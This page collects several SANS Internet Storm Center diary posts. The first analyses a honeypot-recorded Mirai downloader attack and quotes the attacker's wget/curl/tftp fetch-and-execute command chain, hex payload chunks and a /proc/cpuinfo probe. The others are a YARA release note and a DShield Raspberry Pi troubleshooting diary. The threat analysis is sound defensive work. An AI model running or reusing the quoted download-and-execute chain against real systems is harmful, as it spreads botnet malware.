This article does not involve malware reverse engineering, but an analysis of how an attacker executed their plans on our honeypot. Using Cowrie, I observed an attack on 20 August 2023 that stood out from the list of attacks in the TTY logs. Wikipedia describes Cowrie as "…a medium interaction SSH and Telnet honeypot designed to log brute force attacks and shell interaction performed by an attacker. Cowrie also functions as an SSH and telnet proxy to observe attacker behaviour to another system". More information can be found on GitHub:

https://github.com/cowrie/cowrie

The recorded attack was significantly larger, at 177 kB, than the average logged attack, which was half that size or less. After analysis, the observed attack involved a trojan downloader for a botnet.

Playing back the TTY log entry with the Python playlog utility from within Cowrie, I found that the attacker used 51 SSH commands before the connection was terminated. This explains the size of the log.

The attack seemed automated, and involved various system checks before downloading 312 bytes to the /tmp folder with the following command:

wget http://46.29.166[.]61/sh || curl -O http://46.29.166[.]61/sh || tftp 46.29.166[.]61 -c get sh || tftp -g -r sh 46.29.166[.]61; chmod 777 sh;./sh ssh; rm -rf sh

The chain of commands attempts to use built-in Linux tools to download a file called 'sh' from an IP address in Moscow, Russian Federation. It tries wget, curl, or tftp to download 'sh', makes the file executable, runs it with the argument 'ssh', and then removes the downloaded binary.

An error occurred, and the bash output stated that the command was not found. The attacker then tried to delete any existing copies of the files it was about to add to the /tmp folder. The following command was used to accomplish this:

rm -rf x86; rm -rf sshdmiori

Afterwards the attacker obtained information about the honeypot’s CPU with the following command:

cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo

We now come to the next stage of the attack.

Hexadecimal to Binary Executable
Within the 51 executed commands, 41 were hexadecimal payloads being echoed to a file named 'x86'. Below is one of the 41 commands:

echo -ne "x00x08x00x00x00x00x00x00x00x00x00x10x00x00x00x00x00x51xe5x74x64x06x00x00x00x00x00x00x00x00x00x00" >> x86

After concatenating all of the hexadecimal chunks into a binary file, I was able to acquire the SHA256 hash using CyberChef, a tool created and maintained by GCHQ, which can be accessed on GitHub as well: https://github.com/gchq/CyberChef
SHA256: b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852
Each one of the echo commands was copied and pasted into CyberChef, and a 'recipe' was used to decode the strings from hexadecimal to binary and save the result as an executable.
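CyberChef works well, but the reassembly can also be scripted. A minimal sketch, assuming the quoted payload strings (and nothing else) have been collected one per line in a hypothetical chunks.txt:

import hashlib
import re

blob = bytearray()
with open("chunks.txt") as f:
    for line in f:
        # Each "x" followed by two hex digits is one byte of the payload
        for pair in re.findall(r"x([0-9a-fA-F]{2})", line):
            blob.append(int(pair, 16))

with open("x86.bin", "wb") as out:
    out.write(blob)

print(hashlib.sha256(blob).hexdigest())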

Why All of the Hexadecimal Numbers and Commands?

It is clear that the attacker wanted to evade detection by assembling the malware binary on the victim device, rather than risk triggering anti-malware tools by downloading a malicious executable. When consulting the MITRE ATT&CK Framework, there are two key tactics used in this attack that are worth considering:

  • Tactic: Execution (TA0002)
    • Technique: Command and Scripting Interpreter: Unix Shell (T1059.004)
  • Tactic: Defense Evasion (TA0005)
    • Technique: Obfuscated Files or Information: Command Obfuscation (T1027.010)
       

What is It?

The assembled binary's hash comes up in various databases as malicious, categorized as 'Trojan.Mirai / miraidownloader' [6], with several entries from community members attributing it to Mirai malware. Not much is known about this Linux ELF executable. Many databases list it with a low threat score of 3/10. However, just because the score is low does not mean this binary is safe. More information about the malware sample can be found on Recorded Future's Triage webpage [7].


How Can We Mitigate This Kind of Attack?

Our honeypot emulates a poorly defended device on the open Internet. This particular attack scans for open SSH ports attached to devices with weak administrative credentials. Since Mirai-based malware targets IoT devices, one of the simplest forms of defense is to change the default password of the IoT device to a long, complex, unique password (16 characters would be fine). Routers and Apache servers that are targets should be patched according to the guidance in the CVEs. By not exposing IoT devices unnecessarily to the Internet, we can avoid compromise as well.

Samples of the malware can be downloaded from the VirusTotal and Recorded Future [7] websites within the citations below.

[1] What is a Botnet?: https://www.akamai.com/glossary/what-is-a-botnet
[2] What is Mirai?: https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/
[3] TP-Link WAN-Side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal: https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal
[4] Akamai SIRT Security Advisory: CVE-2023-26801 Exploited to spread Mirai Botnet Malware: https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet
[5] Mirai Variant IZ1H9 Exploits: 13 Shocking New Attacks: https://impulsec.com/cybersecurity-news/mirai-variant-iz1h9-exploits/
[6] Virus Total: https://www.virustotal.com/gui/file/b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852
[7] Recorded Future Triage: https://tria.ge/230526-dk1rrsde63
[8] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA 4.5.0 Release, (Sun, Feb 18th)

This post was originally published on this site

YARA 4.4.0 was released, including the announced LNK module.

But the same day, YARA 4.5.0 was released without LNK support. It looks like the LNK module will only be released with the new YARA rewrite in Rust.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[Guest Diary] Learning by doing: Iterative adventures in troubleshooting, (Thu, Feb 15th)

This post was originally published on this site

[This is a Guest Diary by Preston Fitzgerald, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

A DShield honeypot [2] running on a Raspberry Pi can sometimes be a bit of a fickle thing. While some may enjoy a 'set it and forget it' experience, I've found that my device sometimes requires a bit of babysitting. The latest example of this popped up when I connected to the device to inspect logs last week. What began as curiosity about failed log parsing led to learning about the DShield updater.

Background

The honeypot collects various potentially interesting artifacts for analysis. One source of this data is the webhoneypot.json file (/srv/db/webhoneypot.json). Using jq, we can quickly parse this JSON for information about what remote hosts we've seen or what user agents they presented when they made requests to the honeypot:

jq '.headers | .host' webhoneypot.json | sort | uniq > ~/ops/hosts-DD-MM
jq .useragent webhoneypot.json | sort | uniq > ~/ops/agents-DD-MM

Part of the experience of monitoring a system like this is finding what feels good to you and what practices help you produce results. Some handlers will work to implement automation to identify interesting artifacts. Some will hunt and peck around until something catches their eye. One thing I’ve found works for me is periodically dumping information like this to file.

Roadblock ahead

What happened last week? My trusty tool jq returned a cry for help:

parse error: Invalid numeric literal at line 1, column 25165826

webhoneypot.json is malformed in some way. To make matters worse, the Pi was periodically crashing. It's difficult to get any meaningful work done when your SSH sessions have a lifespan of 2 minutes. I decided to pull the card so I could inspect it directly, removing the Pi itself from the equation.

I plugged my card reader into a lab machine and instructed VMware to assign ownership of the device to a Slingshot[3] VM. 


Figure 1: VMware Workstation can treat a device connected physically to the host as if it were connected directly to the guest Virtual Machine. This feature is accessible in the VM -> Removable Devices menu. This card reader is labeled Super Top Mass Storage Device

With the Pi’s storage now mounted to the VM, it’s possible to navigate to the offending file and inspect it.


Figure 2: Screenshot showing the mounted file system 'rootfs' and the contents of /srv/db including webhoneypot.json

Notably, this file occupies nearly half a gigabyte of the card’s limited storage space. That’s a big text file! 

To the toolbox

Where did jq encounter its parsing error again?

parse error: Invalid numeric literal at line 1, column 25165826

It doesn’t like the 25,165,826th character (out of over 450 million total characters). How do we find out what’s in that position? What tools can we use? Another interesting quality of the file is that it consists of one single line. Go-to tools like head and tail are rendered less useful due to the single-line format. Though the file size is within vim’s documented maximum, I found that it struggled to open this file in my virtualized environment.

Thankfully awk’s substring feature will allow us to pluck out just the part of the file we are interested in working with.


Figure 3: Screenshot showing awk’s substring feature. Syntax: substr(string, starting index, length) here we are starting on character 25165820 and grabbing the following 20 characters.
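Reproduced as a command, the invocation in the screenshot would look something like this (the numbers come from the caption above; the exact quoting may differ):

awk '{ print substr($0, 25165820, 20) }' webhoneypot.json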

 

We can begin to see what’s going wrong here by manipulating the starting index and length of the substring and comparing it to prettified JSON that jq is able to output from an earlier entry before it encounters its parsing error:


Figure 4: Screenshot showing expanded substring to get more context before and after the parsing error


Figure 5: Screenshot showing sample JSON structure from part of the document before the parsing error. Here we can see the end of the user agent string underlined in yellow, and the e": 72 part underlined in pink. Comparing the output of awk to the JSON structure we can see just how much information is missing between the two.

 

The JSON structure has been destroyed because the text is truncated between the user agent and part of the signature_id object. Unfortunately, patching up the structure here and re-running jq revealed that there are many such holes in the data. It didn’t take more than a couple of these mending and jq processing cycles to realize that it was futile to try sewing it all back together.

Pivot

So far, we’ve discovered that we have one very large, corrupted log file. It is too damaged to try to piece back together manually and the structure is too damaged to parse it as JSON. How can we salvage the useful artifacts within?

Let’s forget for a moment that this is meant to be JSON and treat it as any other text. By default, grep will return every line that matches the expression. We can use the -o option to return only the matched part of the data. This is useful because otherwise it would return the entire file on any match.

Return user agents:


Figure 6: Screenshot showing grep output matching the user-agent field in webhoneypot.json

Return hosts:


Figure 7: Screenshot showing grep output matching the IP addresses and ports in webhoneypot.json

There are almost always options and many pathways that lead to success. By reaching for another tool, we can get the information we were looking for.
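For reference, the two searches can be approximated like this; the exact patterns used in the screenshots may differ:

grep -oE '"useragent": "[^"]*"' webhoneypot.json | sort | uniq
grep -oE '[0-9]{1,3}(\.[0-9]{1,3}){3}:[0-9]+' webhoneypot.json | sort | uniq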

So what about the Pi?

Let’s quantify my observation that the device was crashing often. Just how often did this happen? I started by copying /var/log/messages from the card over to my local disk. 

How much data are we working with? Let’s get a line count:

wc -l messages

This returned over 450,000 messages. That's good news; we have some information to inspect. How many of those are startup messages?

grep -i booting messages | wc -l

1,371 matches for boot messages. After checking the start and end dates of the log, that's roughly 200 reboots a day on average. Let's see if syslog has additional details for us. After searching for messages related to initial startup and grabbing lines that appear before those messages, I was able to spot something. The log contains many mentions of reboot:

grep -i /sbin/reboot syslog

 


Figure 8: Screenshot showing a sample of the grep results for references to /sbin/reboot in syslog

 

How surprising! The Pi wasn't crashing; it was being rebooted intentionally by a cron job. I copied the DShield cron file located in /etc/cron.d/dshield and took a look at its contents.

grep -i /sbin/reboot dshield

 


Figure 9: A screenshot showing a number of cron jobs that trigger a reboot

Correction: it's not a single cron job, it's several. Something has created 216 cron entries to reboot the Pi (this number is familiar; remember our ~200 reboots per day observation from the logs?). What could have made these entries? Let's search the entire filesystem of the Pi for references to /sbin/reboot

grep -r "/sbin/reboot" .

 


Figure 10: A screenshot showing the line in install.sh that appends reboot commands to /etc/cron.d/dshield.

The DShield installer itself creates these entries. I have version 93 which appears to be one version behind the current installer available on GitHub. The installer works by picking random time offsets. Because the firewall log parser uploads the sensor data before rebooting, the intent here is to spread the load so there isn’t a large spike of incoming sensor data at any one time throughout the day. So why would install.sh be running multiple times? You only run it once when you first install the sensor.

The answer is automatic updates. When you initially configure DShield you can enable automatic updates. The update script checks your current version and compares it to the latest version available on GitHub. Remember that my installed version was one behind current.


Figure 11: The updater compares the current DShield version to the latest available. If it sees that we are behind, it checks out the main branch of the repository and performs git pull to download the latest code before running the installer.

 

Inspecting /srv/log for install logs, it’s clear that the installer is running hundreds of times per day. 

 


Figure 12: A screenshot showing a directory listing of /srv/log where we see timestamped logs indicating the installer was running many times per day.

 

So what happened?

Knowing for certain which problem happened first will require further log review, but my current hypothesis is this: At some point, the updater started the installer. The installer created a cron job to kick off a reboot but the random time set for the task happened to be very near the current time. The installer was unable to finish its work before the Pi shut itself down. This is supported by the fact that some of the install logs I reviewed seem to end abruptly before the final messages are printed out.

There are several errors found throughout these logs, including missing certificates, failed package update steps, locked log files, and 'expected programs not found in PATH'. I believe some combination of these problems caused the installer to fail each time it was run by the updater, resulting in a loop.

Remediation

Re-imaging the Pi will be the simplest way to get us out of this situation, but how could the problem be remediated in the long run?

Regardless of the initial cause of this problem, one potential fix for the issue of redundant cron jobs is this:

Before appending the cron job with the reboot and upload tasks, the installer could delete /etc/cron.d/dshield. It appears this file only has four unique entries:

 


Figure 13: A screenshot showing the four unique cron jobs used by DShield. We only need these entries, and not the hundreds of redundant lines.

 

By deleting the file and creating each of these jobs fresh when the installer runs, we can eliminate the risk of creating an 864-line cron configuration file.

It may also be advantageous to move this part of the installer script to the end of the process to eliminate the risk of the reboot firing before the script completes.

Most computer-inclined folks like their processes, their patterns, their Standard Operating Procedures. It's important that we remain curious and nimble. Sometimes discovering something interesting or useful is the direct result of asking ourselves 'why' when something doesn't seem right. Having the option to throw away a VM or revert it to snapshot is great. Throwing away a docker container that isn't working the way we expect is convenient. Re-imaging a Pi to get it back to a known-good state helps us jump right back into our work. However, there can be real educational benefit when we slow down and perform troubleshooting on these things we generally view as ephemeral, and when we share what we have learned, it can lead to improvements from which we all benefit.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] DShield: https://github.com/DShield-ISC/dshield
[3] Slingshot Linux: https://www.sans.org/tools/slingshot/

 


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.